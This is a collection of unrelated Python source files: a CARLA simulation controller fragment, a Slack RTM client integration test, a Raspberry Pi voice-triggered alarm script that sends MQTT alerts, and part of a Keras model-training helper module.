def create_sensor(self, sensor_type, name, update_interval=1.0):
# Create sensor
sensor = None
if sensor_type == 'imu':
print("adding imu")
sensor = IMUSensor(self, name, update_interval)
elif sensor_type == 'gnss':
print("adding gnss")
sensor = GNSSSensor(self, name, update_interval)
elif sensor_type == 'camera':
print("adding camera")
sensor = CameraSensor(self, name, update_interval)
elif sensor_type == 'tachometer':
print("adding tachometer")
sensor = TachometerSensor(self, name, update_interval)
else:
raise ValueError('Selected sensor type is not supported!')
# Append sensor to list
print("adding sensor:", sensor)
self.sensors.append(sensor)
print("create sensor finished.")
def delete_sensor(self, name: str) -> None:
# Remove sensor with given name
self.sensors[:] = [
sensor for sensor in self.sensors if sensor.name != name]
def get_world(self):
"""Returns carla world
Returns
-------
carla.World
Carla world object
"""
return self.carla_world
def get_world_step(self):
return self.world_step
def set_world_step(self, step: float) -> None:
# Save new value
self.world_step = step
# Update time step in carla world
settings = self.carla_world.get_settings()
settings.fixed_delta_seconds = self.world_step
self.carla_world.apply_settings(settings)
def get_vehicle(self):
return self.carla_vehicle
def get_blueprint_library(self):
"""Returns carla blueprint library
Returns
-------
carla.BlueprintLibrary
Carla blueprint library
"""
return self.carla_blueprint_library
    def save_configuration(self, file):
        """Save the current controller configuration to `file` (not implemented yet)."""
        pass
def load_configuration(self, file):
pass
def get_sensor(self, name):
return next((sensor for sensor in self.sensors if sensor.get_name() == name), None)
def get_sensor_list(self) -> list:
return [{'name': sensor.get_name(), 'type': sensor.get_type()} for sensor in self.sensors]
def get_encoder(self, name):
pass
def apply_vehicle_control(self, control: carla.VehicleControl):
self.vehicle_control = control
def reset_simulation(self):
# Stop simulation
# self.stop_simulation()
# Reset vehicle position
if self.carla_vehicle and self.spawn_point:
self.carla_vehicle.set_transform(self.spawn_point)
# Restart simulation
# self.start_simulation()
def start_simulation(self):
self.running = True
self.simulation_thread.start()
def stop_simulation(self):
self.running = False
def _simulation_loop(self):
while self.running:
# Start clock
t_start = time.perf_counter()
# Let server compute next simulation step
frame = self.carla_world.tick()
# Handle all sensors (TODO: maybe enable multithreading in the future)
for sensor in self.sensors:
sensor.tick(frame)
# Apply control input
if self.external_control:
self.carla_vehicle.apply_control(self.vehicle_control)
else:
                # Activate CARLA's internal autopilot to drive around
self.carla_vehicle.set_autopilot(True)
# Sleep until the end of the cycle
t_elapsed = time.perf_counter() - t_start
if self.real_time:
sleep_time = self.world_step - t_elapsed
if sleep_time > 0:
# logger.debug(
# "Cycle done. Sleep {0:3f}s until next cycle.".format(sleep_time))
time.sleep(sleep_time)
else:
                    logger.debug(
                        "Elapsed time: {:.3f}s (exceeded limit by {:.3f}s)".format(t_elapsed, -sleep_time))
else:
pass
# logger.debug(
# "Elapsed time: {0:3f}s".format(t_elapsed))
logger.debug("Leaving simulation loop")
|
test_issue_631.py
|
import asyncio
import collections
import logging
import os
import threading
import time
import traceback
import unittest
import pytest
from integration_tests.env_variable_names import \
SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from integration_tests.helpers import async_test, is_not_specified
from slack import RTMClient, WebClient
class TestRTMClient(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/631
"""
def setUp(self):
if not hasattr(self, "logger"):
self.logger = logging.getLogger(__name__)
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
# Stop the Client
if hasattr(self, "rtm_client") and not self.rtm_client._stopped:
self.rtm_client.stop()
@pytest.mark.skipif(condition=is_not_specified(), reason="to avoid rate_limited errors")
def test_issue_631_sharing_event_loop(self):
self.success = None
self.text = "This message was sent to verify issue #631"
self.rtm_client = RTMClient(
token=self.bot_token,
run_async=False,
            loop=asyncio.new_event_loop(),  # TODO: the test fails without explicitly passing a new event loop
)
# @RTMClient.run_on(event="message")
# def send_reply(**payload):
# self.logger.debug(payload)
# data = payload['data']
# web_client = payload['web_client']
# web_client._event_loop = self.loop
# # Maybe you will also need the following line uncommented
# # web_client.run_async = True
#
# if self.text in data['text']:
# channel_id = data['channel']
# thread_ts = data['ts']
# try:
# self.success = web_client.chat_postMessage(
# channel=channel_id,
# text="Thanks!",
# thread_ts=thread_ts
# )
# except Exception as e:
# # slack.rtm.client:client.py:446 When calling '#send_reply()'
# # in the 'test_rtm_client' module the following error was raised: This event loop is already running
# self.logger.error(traceback.format_exc())
# raise e
# Solution (1) for #631
@RTMClient.run_on(event="message")
def send_reply(**payload):
self.logger.debug(payload)
data = payload['data']
web_client = payload['web_client']
try:
if "text" in data and self.text in data["text"]:
channel_id = data['channel']
thread_ts = data['ts']
self.success = web_client.chat_postMessage(
channel=channel_id,
text="Thanks!",
thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
        t.daemon = True
t.start()
try:
self.assertIsNone(self.success)
time.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertIsNotNone(self.success)
finally:
t.join(.3)
# Solution (2) for #631
@pytest.mark.skipif(condition=is_not_specified(), reason="this is just for reference")
@async_test
async def test_issue_631_sharing_event_loop_async(self):
self.success = None
self.text = "This message was sent to verify issue #631"
# To make run_async=True, the test method needs to be an async function + @async_test decorator
self.rtm_client = RTMClient(token=self.bot_token, run_async=True)
self.web_client = WebClient(token=self.bot_token, run_async=True)
@RTMClient.run_on(event="message")
async def send_reply(**payload):
self.logger.debug(payload)
data = payload['data']
web_client = payload['web_client']
try:
if "text" in data and self.text in data["text"]:
channel_id = data['channel']
thread_ts = data['ts']
self.success = await web_client.chat_postMessage(
channel=channel_id,
text="Thanks!",
thread_ts=thread_ts
)
except Exception as e:
self.logger.error(traceback.format_exc())
raise e
# intentionally not waiting here
self.rtm_client.start()
self.assertIsNone(self.success)
await asyncio.sleep(5)
self.web_client = WebClient(
token=self.bot_token,
run_async=True, # all need to be async here
)
new_message = await self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
await asyncio.sleep(5)
self.assertIsNotNone(self.success)
|
live_audio_streaming.py
|
import time, logging
import os, sys, argparse
from datetime import datetime
import threading, collections, queue, os, os.path
import deepspeech
import numpy as np
import pyaudio
import wave
import webrtcvad
from halo import Halo
from scipy import signal
import cpuinfo
import paho.mqtt.client as mqtt
import json
import socket
import RPi.GPIO as GPIO
from threading import Thread
sys.path.append('/home/pi/projects/lumin/Lumin_FW_Src/audio_application/python/src')
sys.path.append('/home/pi/projects/lumin/Lumin_FW_Src/audio_application/python/lumota')
from libnyumaya import AudioRecognition,FeatureExtractor
from auto_platform import AudiostreamSource, play_command,default_libpath
from pixels import Pixels
REMOTE_SERVER = "www.google.com"
MQTT_BROKER = "ec2-52-37-146-89.us-west-2.compute.amazonaws.com"
PORT = 1883
KEEP_ALIVE = 10
flag_connected = 0
FIRMWARE_VERSION = "V_1.0"
CONFIRMATION_WAIT = 20
RECORDINGS_PATH = '/home/pi/projects/lumin/Lumin_FW_Src/audio_application/rec/'
VOLUME = 40
os.makedirs(RECORDINGS_PATH, exist_ok=True)
# Read the CPU serial number (Linux/ARM only)
cpuserial = "0000000000000000"
info = cpuinfo.get_cpu_info()
arch = info['arch']
if arch.startswith('ARM'):
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
DEV_UUID = "LUMIN_"+cpuserial
LOG = "ALL"
print("Device UUID : " + DEV_UUID)
#logging creation
log_file_name = "/var/log/lumin/Device_log.log"
logging.basicConfig(filename=log_file_name,format='%(asctime)s %(message)s',filemode='a')
logger=logging.getLogger()
logger.setLevel(logging.INFO)
phrases = {
'help': ['help'],
'intruder': ['intruder'],
'fire': ['fire'],
'yes': ['yes'],
'no': ['no']
}
confirmation_message = "espeak --stdout -a {0} 'Did you say {1}' | aplay -Dsysdefault"
#Function to check internet connectivity, returns true is internet is up.
def check_internet(hostname):
try:
host = socket.gethostbyname(hostname)
s = socket.create_connection((host,80),2)
s.close()
return True
except:
pass
return False
def check_button_press():
BUTTON = 17
GPIO.setmode(GPIO.BCM)
GPIO.setup(BUTTON, GPIO.IN)
while True:
pressed = not (GPIO.input(BUTTON))
if pressed:
global VOLUME
if VOLUME + 40 > 200:
VOLUME = 0
pixels.BRIGHTNESS = 5
pixels.refresh_colors()
else:
VOLUME = VOLUME + 40
pixels.BRIGHTNESS = pixels.BRIGHTNESS + 19
pixels.refresh_colors()
time.sleep(0.1)
#MQTT client connection callback function
def on_connect(client, userdata, flags, rc):
global flag_connected
flag_connected = 1
print("MQTT Connect")
logger.info("Connected to MQTT Broker")
#MQTT client disconnect callback function
def on_disconnect(client, userdata, rc):
global flag_connected
flag_connected = 0
print("MQTT Disconnect")
logger.error("Disconnected from MQTT Broker")
#Last will message JSON
last_will = {}
last_will['device_name'] = DEV_UUID
last_will['status'] = "offline"
last_will_json = json.dumps(last_will)
mqtt_client = mqtt.Client(DEV_UUID)
mqtt_client.on_connect = on_connect
mqtt_client.on_disconnect = on_disconnect
mqtt_client.will_set("status", payload=last_will_json, qos=0, retain=True)
#MQTT message trigger function, sends an MQTT trigger with details in JSON format
def send_mqtt_trigger(time_stamp,trigger_name,confirmation):
message = {}
message['timestamp'] = time_stamp
message['device_name'] = DEV_UUID
message['sound_name'] = trigger_name
message['is_confirmed'] = confirmation
json_msg = json.dumps(message)
print(json_msg)
print("Sending MQTT trigger !")
global flag_connected
if(flag_connected == 0):
mqtt_client.connect(MQTT_BROKER,PORT,KEEP_ALIVE)
mqtt_client.loop_start()
mqtt_client.publish("trigger",json_msg)
class Audio(object):
"""Streams raw audio from microphone. Data is received in a separate thread, and stored in a buffer, to be read from."""
FORMAT = pyaudio.paInt16
# Network/VAD rate-space
RATE_PROCESS = 16000
CHANNELS = 1
BLOCKS_PER_SECOND = 50
def __init__(self, callback=None, device=None, input_rate=RATE_PROCESS, file=None):
def proxy_callback(in_data, frame_count, time_info, status):
#pylint: disable=unused-argument
if self.chunk is not None:
in_data = self.wf.readframes(self.chunk)
callback(in_data)
return (None, pyaudio.paContinue)
if callback is None: callback = lambda in_data: self.buffer_queue.put(in_data)
self.buffer_queue = queue.Queue()
self.device = device
self.input_rate = input_rate
self.sample_rate = self.RATE_PROCESS
self.block_size = int(self.RATE_PROCESS / float(self.BLOCKS_PER_SECOND))
self.block_size_input = int(self.input_rate / float(self.BLOCKS_PER_SECOND))
self.pa = pyaudio.PyAudio()
kwargs = {
'format': self.FORMAT,
'channels': self.CHANNELS,
'rate': self.input_rate,
'input': True,
'frames_per_buffer': self.block_size_input,
'stream_callback': proxy_callback,
}
self.chunk = None
# if not default device
if self.device:
kwargs['input_device_index'] = self.device
elif file is not None:
self.chunk = 320
self.wf = wave.open(file, 'rb')
self.stream = self.pa.open(**kwargs)
self.stream.start_stream()
def resample(self, data, input_rate):
"""
Microphone may not support our native processing sampling rate, so
resample from input_rate to RATE_PROCESS here for webrtcvad and
deepspeech
Args:
data (binary): Input audio stream
input_rate (int): Input audio rate to resample from
"""
        data16 = np.frombuffer(data, dtype=np.int16)
resample_size = int(len(data16) / self.input_rate * self.RATE_PROCESS)
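        # Example: with input_rate = 44100 and BLOCKS_PER_SECOND = 50 each block holds
        # int(44100 / 50) = 882 samples, so resample_size = int(882 / 44100 * 16000) = 320,
        # i.e. a 20 ms frame at the 16 kHz rate expected by webrtcvad and DeepSpeech.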
resample = signal.resample(data16, resample_size)
resample16 = np.array(resample, dtype=np.int16)
        return resample16.tobytes()
def read_resampled(self):
"""Return a block of audio data resampled to 16000hz, blocking if necessary."""
return self.resample(data=self.buffer_queue.get(),
input_rate=self.input_rate)
def read(self):
"""Return a block of audio data, blocking if necessary."""
return self.buffer_queue.get()
def destroy(self):
self.stream.stop_stream()
self.stream.close()
self.pa.terminate()
frame_duration_ms = property(lambda self: 1000 * self.block_size // self.sample_rate)
def write_wav(self, filename, data):
logging.info("write wav %s", filename)
wf = wave.open(filename, 'wb')
wf.setnchannels(self.CHANNELS)
# wf.setsampwidth(self.pa.get_sample_size(FORMAT))
assert self.FORMAT == pyaudio.paInt16
wf.setsampwidth(2)
wf.setframerate(self.sample_rate)
wf.writeframes(data)
wf.close()
class VADAudio(Audio):
"""Filter & segment audio with voice activity detection."""
def __init__(self, aggressiveness=3, device=None, input_rate=None, file=None):
super().__init__(device=device, input_rate=input_rate, file=file)
self.vad = webrtcvad.Vad(aggressiveness)
def frame_generator(self):
"""Generator that yields all audio frames from microphone."""
if self.input_rate == self.RATE_PROCESS:
while True:
yield self.read()
else:
while True:
yield self.read_resampled()
def vad_collector(self, padding_ms=300, ratio=0.75, frames=None):
"""Generator that yields series of consecutive audio frames comprising each utterence, separated by yielding a single None.
Determines voice activity by ratio of frames in padding_ms. Uses a buffer to include padding_ms prior to being triggered.
Example: (frame, ..., frame, None, frame, ..., frame, None, ...)
                  |---utterance---|        |---utterance---|
"""
if frames is None: frames = self.frame_generator()
num_padding_frames = padding_ms // self.frame_duration_ms
ring_buffer = collections.deque(maxlen=num_padding_frames)
triggered = False
for frame in frames:
if len(frame) < 640:
return
is_speech = self.vad.is_speech(frame, self.sample_rate)
if not triggered:
ring_buffer.append((frame, is_speech))
num_voiced = len([f for f, speech in ring_buffer if speech])
if num_voiced > ratio * ring_buffer.maxlen:
triggered = True
for f, s in ring_buffer:
yield f
ring_buffer.clear()
else:
yield frame
ring_buffer.append((frame, is_speech))
num_unvoiced = len([f for f, speech in ring_buffer if not speech])
if num_unvoiced > ratio * ring_buffer.maxlen:
triggered = False
yield None
ring_buffer.clear()
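# Minimal usage sketch for VADAudio (assumes a microphone on the default input device;
# frame handling is shown only in outline):
#
#   vad_audio = VADAudio(aggressiveness=3, input_rate=16000)
#   for frame in vad_audio.vad_collector(padding_ms=300, ratio=0.75):
#       if frame is not None:
#           pass  # feed the 16 kHz, 20 ms frame to the recognizer
#       else:
#           pass  # None marks the end of an utterance; finalize decoding here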
def getModel(ARGS):
# Load DeepSpeech model
if os.path.isdir(ARGS.model):
model_dir = ARGS.model
ARGS.model = os.path.join(model_dir, 'output_graph.pb')
ARGS.scorer = os.path.join(model_dir, ARGS.scorer)
print('Initializing model...')
logging.info("ARGS.model: %s", ARGS.model)
model = deepspeech.Model(ARGS.model)
#model.addHotWord('Fire', 10)
#model.addHotWord('Intruder', 10)
#model.addHotWord('Help', 10)
#model.addHotWord('Yes', 10)
#model.addHotWord('No', 10)
if ARGS.scorer:
logging.info("ARGS.scorer: %s", ARGS.scorer)
model.enableExternalScorer(ARGS.scorer)
return model
is_confirmed = False
is_any_light_on = False
is_fire = False
is_help = False
is_intruder = False
start_time = time.time()
pixels = Pixels()
pixels.on()
def confirmation():
global is_confirmed
global is_any_light_on
is_confirmed = False
is_any_light_on = False
pixels.on()
print ('stopping confirmation wait {}: '.format(is_confirmed))
def main(ARGS):
# os.system("espeak -a {0} --stdout 'Starting the Service' | aplay -Dsysdefault".format(VOLUME))
pixels.on()
model = getModel(ARGS)
# Start audio with VAD
vad_audio = VADAudio(aggressiveness=ARGS.vad_aggressiveness,
device=ARGS.device,
input_rate=ARGS.rate,
file=ARGS.file)
print("Listening (ctrl-C to exit)...")
frames = vad_audio.vad_collector()
# Stream from microphone to DeepSpeech using VAD
spinner = None
if not ARGS.nospinner:
spinner = Halo(spinner='line')
stream_context = model.createStream()
wav_data = bytearray()
global is_confirmed
global is_any_light_on
global is_fire
global is_help
global is_intruder
global start_time
is_confirmed = False
is_any_light_on = False
is_fire = False
is_help = False
is_intruder = False
start_time = time.time()
hotword = ""
for frame in frames:
if not is_any_light_on:
pixels.on()
if frame is not None:
if spinner: spinner.start()
stream_context.feedAudioContent(np.frombuffer(frame, np.int16))
else:
if spinner: spinner.stop()
text = (stream_context.finishStream()).upper()
for p in phrases:
if p.upper() in text:
if time.time() - start_time > 2:
is_fire = False
is_help = False
is_intruder = False
if not is_confirmed and (p.upper() == 'FIRE' or p.upper() == 'INTRUDER' or p.upper() == 'HELP'):
checkword = True
if text.count(p.upper()) > 1 or is_fire or is_help or is_intruder:
pixels.detected()
is_any_light_on = True
os.system(confirmation_message.format(VOLUME, p))
t = threading.Timer(5, confirmation)
t.start()
is_confirmed = True
hotword = p
is_fire = False
is_help = False
is_intruder = False
checkword = False
if checkword:
start_time = time.time()
if not is_fire and p.upper() == 'FIRE':
is_fire = True
if not is_intruder and p.upper() == 'INTRUDER':
is_intruder = True
if not is_help and p.upper() == 'HELP':
is_help = True
elif is_confirmed and (p.upper() == 'YES'): # and time.time() < (start + 5):
# send message
is_confirmed = False
t.cancel()
pixels.confirmed()
is_any_light_on = True
if check_internet(REMOTE_SERVER):
os.system("espeak -a {0} --stdout 'Sending Trigger' | aplay -Dsysdefault".format(VOLUME))
print ("Recognized, {}".format(p))
now = datetime.now().isoformat()
logger.info('Sending trigger...')
send_mqtt_trigger(now, hotword, True)
pixels.on()
is_any_light_on = False
else:
os.system("espeak -a {0} --stdout 'No internet connection' | aplay".format(VOLUME))
print("No internet connection, MQTT trigger not sent")
logger.error("No internet connection, MQTT trigger not sent")
pixels.ota()
is_any_light_on = True
is_confirmed = False
elif is_confirmed and (p.upper() == 'NO'): # and time.time() < (start + 5):
print ("Recognized, {}".format(p))
is_confirmed = False
t.cancel()
pixels.confirmed()
is_any_light_on = True
if check_internet(REMOTE_SERVER):
now = datetime.now().isoformat()
print ("Recognized, {}".format(p))
logger.info('Sending trigger...')
send_mqtt_trigger(now, hotword, False)
pixels.on()
is_any_light_on = False
else:
os.system("espeak -a {0} --stdout 'No internet connection' | aplay".format(VOLUME))
print("No internet connection, MQTT trigger not sent")
logger.error("No internet connection, MQTT trigger not sent")
pixels.ota()
is_any_light_on = True
pixels.on()
is_any_light_on = False
else:
print ("Recognized, {}".format(p))
stream_context = model.createStream()
if __name__ == '__main__':
DEFAULT_SAMPLE_RATE = 16000
parser = argparse.ArgumentParser(description="Stream from microphone to DeepSpeech using VAD")
parser.add_argument('-v', '--vad_aggressiveness', type=int, default=3,
help="Set aggressiveness of VAD: an integer between 0 and 3, 0 being the least aggressive about filtering out non-speech, 3 the most aggressive. Default: 3")
parser.add_argument('--nospinner', action='store_true',
help="Disable spinner")
parser.add_argument('-w', '--savewav',
help="Save .wav files of utterences to given directory")
parser.add_argument('-f', '--file',
help="Read from .wav file instead of microphone")
parser.add_argument('-m', '--model', required=True,
help="Path to the model (protocol buffer binary file, or entire directory containing all standard-named files for model)")
parser.add_argument('-s', '--scorer',
help="Path to the external scorer file.")
parser.add_argument('-d', '--device', type=int, default=None,
help="Device input index (Int) as listed by pyaudio.PyAudio.get_device_info_by_index(). If not provided, falls back to PyAudio.get_default_device().")
parser.add_argument('-r', '--rate', type=int, default=DEFAULT_SAMPLE_RATE,
help=f"Input device sample rate. Default: {DEFAULT_SAMPLE_RATE}. Your device may require 44100.")
ARGS = parser.parse_args()
if ARGS.savewav: os.makedirs(ARGS.savewav, exist_ok=True)
thread = Thread(target=check_button_press)
thread.start()
main(ARGS)
|
training.py
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import warnings
import copy
import time
import numpy as np
import multiprocessing
import threading
import six
try:
import queue
except ImportError:
import Queue as queue
from .topology import Container
from .. import backend as K
from .. import optimizers
from .. import losses
from .. import metrics as metrics_module
from ..utils.generic_utils import Progbar
from .. import callbacks as cbks
from ..legacy import interfaces
def _standardize_input_data(data, names, shapes=None,
check_batch_axis=True,
exception_prefix=''):
"""Normalizes inputs and targets provided by users.
Users may pass data as a list of arrays, dictionary of arrays,
or as a single array. We normalize this to an ordered list of
arrays (same order as `names`), while checking that the provided
arrays have shapes that match the network's expectations.
# Arguments
data: User-provided input data (polymorphic).
names: List of expected array names.
shapes: Optional list of expected array shapes.
check_batch_axis: Boolean; whether to check that
the batch axis of the arrays matches the expected
value found in `shapes`.
exception_prefix: String prefix used for exception formatting.
# Returns
List of standardized input arrays (one array per model input).
# Raises
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
return []
if data is None:
return [None for _ in range(len(names))]
if isinstance(data, dict):
arrays = []
for name in names:
if name not in data:
raise ValueError('No data provided for "' +
name + '". Need data for each key in: ' +
str(names))
arrays.append(data[name])
elif isinstance(data, list):
if len(data) != len(names):
if data and hasattr(data[0], 'shape'):
raise ValueError('Error when checking model ' +
exception_prefix +
': the list of Numpy arrays '
'that you are passing to your model '
'is not the size the model expected. '
'Expected to see ' + str(len(names)) +
' arrays but instead got '
'the following list of ' + str(len(data)) +
' arrays: ' + str(data)[:200] +
'...')
else:
if len(names) == 1:
data = [np.asarray(data)]
else:
raise ValueError(
'Error when checking model ' +
exception_prefix +
': you are passing a list as '
'input to your model, '
'but the model expects '
'a list of ' + str(len(names)) +
' Numpy arrays instead. '
'The list you passed was: ' +
str(data)[:200])
arrays = data
else:
if not hasattr(data, 'shape'):
raise TypeError('Error when checking model ' +
exception_prefix +
': data should be a Numpy array, '
'or list/dict of Numpy arrays. '
'Found: ' + str(data)[:200] + '...')
if len(names) > 1:
# Case: model expects multiple inputs but only received
# a single Numpy array.
raise ValueError('The model expects ' + str(len(names)) +
exception_prefix +
' arrays, but only received one array. '
'Found: array with shape ' + str(data.shape))
arrays = [data]
# Make arrays at least 2D.
for i in range(len(names)):
array = arrays[i]
if len(array.shape) == 1:
array = np.expand_dims(array, 1)
arrays[i] = array
# Check shapes compatibility.
if shapes:
for i in range(len(names)):
if shapes[i] is None:
continue
array = arrays[i]
if len(array.shape) != len(shapes[i]):
raise ValueError('Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have ' + str(len(shapes[i])) +
' dimensions, but got array with shape ' +
str(array.shape))
for j, (dim, ref_dim) in enumerate(zip(array.shape, shapes[i])):
if not j and not check_batch_axis:
# skip the first axis
continue
if ref_dim:
if ref_dim != dim:
raise ValueError(
'Error when checking ' + exception_prefix +
': expected ' + names[i] +
' to have shape ' + str(shapes[i]) +
' but got array with shape ' +
str(array.shape))
return arrays
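# Example of the normalization above, for a model with input names ['a', 'b'] and
# hypothetical arrays xa, xb:
#   _standardize_input_data({'b': xb, 'a': xa}, ['a', 'b'])  ->  [xa, xb]
# A single bare array x for a single-input model becomes [x]; 1D arrays are expanded
# to shape (n, 1) before the optional shape check.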
def _standardize_sample_or_class_weights(x_weight, output_names, weight_type):
"""Maps `sample_weight` or `class_weight` to model outputs.
# Arguments
x_weight: User-provided `sample_weight` or `class_weight` argument.
output_names: List of output names (strings) in the model.
weight_type: A string used purely for exception printing.
# Returns
        A list of `sample_weight` or `class_weight` with exactly
        one element per model output.
# Raises
ValueError: In case of invalid user-provided argument.
"""
if x_weight is None or len(x_weight) == 0:
return [None for _ in output_names]
if len(output_names) == 1:
if isinstance(x_weight, list) and len(x_weight) == 1:
return x_weight
if isinstance(x_weight, dict) and output_names[0] in x_weight:
return [x_weight[output_names[0]]]
else:
return [x_weight]
if isinstance(x_weight, list):
if len(x_weight) != len(output_names):
raise ValueError('Provided `' + weight_type + '` was a list of ' +
str(len(x_weight)) +
' elements, but the model has ' +
str(len(output_names)) + ' outputs. '
'You should provide one `' + weight_type + '`'
                             ' array per model output.')
return x_weight
if isinstance(x_weight, dict):
x_weights = []
for name in output_names:
x_weights.append(x_weight.get(name))
return x_weights
else:
raise TypeError('The model has multiple outputs, so `' +
weight_type + '` '
                        'should be either a list or a dict. '
'Provided `' + weight_type +
'` type not understood: ' +
str(x_weight))
def _standardize_class_weights(class_weight, output_names):
return _standardize_sample_or_class_weights(class_weight,
output_names,
'class_weight')
def _standardize_sample_weights(sample_weight, output_names):
return _standardize_sample_or_class_weights(sample_weight,
output_names,
'sample_weight')
def _check_array_lengths(inputs, targets, weights):
"""Does user input validation for numpy arrays.
# Arguments
inputs: list of Numpy arrays of inputs.
targets: list of Numpy arrays of targets.
weights: list of Numpy arrays of sample weights.
# Raises
ValueError: in case of incorrectly formatted data.
"""
x_lengths = [x.shape[0] for x in inputs]
y_lengths = [y.shape[0] for y in targets]
w_lengths = [w.shape[0] for w in weights]
set_x = set(x_lengths)
if len(set_x) > 1:
raise ValueError('All input arrays (x) should have '
'the same number of samples. Got array shapes: ' +
str([x.shape for x in inputs]))
set_y = set(y_lengths)
if len(set_y) > 1:
raise ValueError('All target arrays (y) should have '
'the same number of samples. Got array shapes: ' +
str([y.shape for y in targets]))
set_w = set(w_lengths)
if len(set_w) > 1:
raise ValueError('All sample_weight arrays should have '
'the same number of samples. Got array shapes: ' +
str([w.shape for w in weights]))
if set_x and set_y and list(set_x)[0] != list(set_y)[0]:
raise ValueError('Input arrays should have '
'the same number of samples as target arrays. '
'Found ' + str(list(set_x)[0]) + ' input samples '
'and ' + str(list(set_y)[0]) + ' target samples.')
if set_y and set_w and list(set_y)[0] != list(set_w)[0]:
raise ValueError('Sample_weight arrays should have '
'the same number of samples as target arrays. Got ' +
str(list(set_y)[0]) + ' input samples and ' +
str(list(set_w)[0]) + ' target samples.')
def _check_loss_and_target_compatibility(targets, loss_fns, output_shapes):
"""Does validation on the compatiblity of targets and loss functions.
This helps prevent users from using loss functions incorrectly.
# Arguments
targets: list of Numpy arrays of targets.
loss_fns: list of loss functions.
output_shapes: list of shapes of model outputs.
# Raises
ValueError: if a loss function or target array
is incompatible with an output.
"""
    key_losses = {'mean_squared_error',
'binary_crossentropy',
'categorical_crossentropy'}
for y, loss, shape in zip(targets, loss_fns, output_shapes):
if loss is None:
continue
if loss.__name__ == 'categorical_crossentropy':
if y.shape[-1] == 1:
raise ValueError(
'You are passing a target array of shape ' + str(y.shape) +
' while using as loss `categorical_crossentropy`. '
'`categorical_crossentropy` expects '
'targets to be binary matrices (1s and 0s) '
'of shape (samples, classes). '
'If your targets are integer classes, '
'you can convert them to the expected format via:\n'
'```\n'
'from keras.utils.np_utils import to_categorical\n'
'y_binary = to_categorical(y_int)\n'
'```\n'
'\n'
'Alternatively, you can use the loss function '
'`sparse_categorical_crossentropy` instead, '
'which does expect integer targets.')
if loss.__name__ in key_losses:
for target_dim, out_dim in zip(y.shape[1:], shape[1:]):
if out_dim is not None and target_dim != out_dim:
raise ValueError(
'A target array with shape ' + str(y.shape) +
' was passed for an output of shape ' + str(shape) +
' while using as loss `' + loss.__name__ + '`. '
'This loss expects '
'targets to have the same shape '
'as the output.')
def _collect_metrics(metrics, output_names):
"""Maps metric functions to model outputs.
# Arguments
metrics: a list or dict of metric functions.
output_names: a list of the names (strings) of model outputs.
# Returns
A list (one entry per model output) of lists of metric functions.
For instance, if the model has 2 outputs, and for the first output
we want to compute "binary_accuracy" and "binary_crossentropy",
and just "binary_accuracy" for the second output,
the list would look like:
`[[binary_accuracy, binary_crossentropy], [binary_accuracy]]`
# Raises
TypeError: if an incorrect type is passed for the `metrics` argument.
"""
if not metrics:
return [[] for _ in output_names]
if isinstance(metrics, list):
# we then apply all metrics to all outputs.
return [copy.copy(metrics) for _ in output_names]
elif isinstance(metrics, dict):
nested_metrics = []
for name in output_names:
output_metrics = metrics.get(name, [])
if not isinstance(output_metrics, list):
output_metrics = [output_metrics]
nested_metrics.append(output_metrics)
return nested_metrics
else:
raise TypeError('Type of `metrics` argument not understood. '
'Expected a list or dictionary, found: ' +
str(metrics))
def _batch_shuffle(index_array, batch_size):
"""Shuffles an array in a batch-wise fashion.
Useful for shuffling HDF5 arrays
(where one cannot access arbitrary indices).
# Arguments
index_array: array of indices to be shuffled.
batch_size: integer.
# Returns
The `index_array` array, shuffled in a batch-wise fashion.
"""
batch_count = int(len(index_array) / batch_size)
# to reshape we need to be cleanly divisible by batch size
# we stash extra items and reappend them after shuffling
last_batch = index_array[batch_count * batch_size:]
index_array = index_array[:batch_count * batch_size]
index_array = index_array.reshape((batch_count, batch_size))
np.random.shuffle(index_array)
index_array = index_array.flatten()
return np.append(index_array, last_batch)
def _make_batches(size, batch_size):
"""Returns a list of batch indices (tuples of indices).
# Arguments
size: Integer, total size of the data to slice into batches.
batch_size: Integer, batch size.
# Returns
A list of tuples of array indices.
"""
num_batches = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size))
for i in range(0, num_batches)]
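# Example: _make_batches(10, 3) -> [(0, 3), (3, 6), (6, 9), (9, 10)], i.e. (start, stop)
# index pairs covering all 10 samples, with a smaller final batch.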
def _slice_arrays(arrays, start=None, stop=None):
"""Slice an array or list of arrays.
This takes an array-like, or a list of
array-likes, and outputs:
- arrays[start:stop] if `arrays` is an array-like
- [x[start:stop] for x in arrays] if `arrays` is a list
Can also work on list/array of indices: `_slice_arrays(x, indices)`
# Arguments
arrays: Single array or list of arrays.
start: can be an integer index (start index)
or a list/array of indices
stop: integer (stop index); should be None if
`start` was a list.
# Returns
A slice of the array(s).
"""
if isinstance(arrays, list):
if hasattr(start, '__len__'):
# hdf5 datasets only support list objects as indices
if hasattr(start, 'shape'):
start = start.tolist()
return [x[start] for x in arrays]
else:
return [x[start:stop] for x in arrays]
else:
if hasattr(start, '__len__'):
if hasattr(start, 'shape'):
start = start.tolist()
return arrays[start]
else:
return arrays[start:stop]
def _weighted_masked_objective(fn):
"""Adds support for masking and sample-weighting to an objective function.
It transforms an objective function `fn(y_true, y_pred)`
into a sample-weighted, cost-masked objective function
`fn(y_true, y_pred, weights, mask)`.
# Arguments
fn: The objective function to wrap,
with signature `fn(y_true, y_pred)`.
# Returns
A function with signature `fn(y_true, y_pred, weights, mask)`.
"""
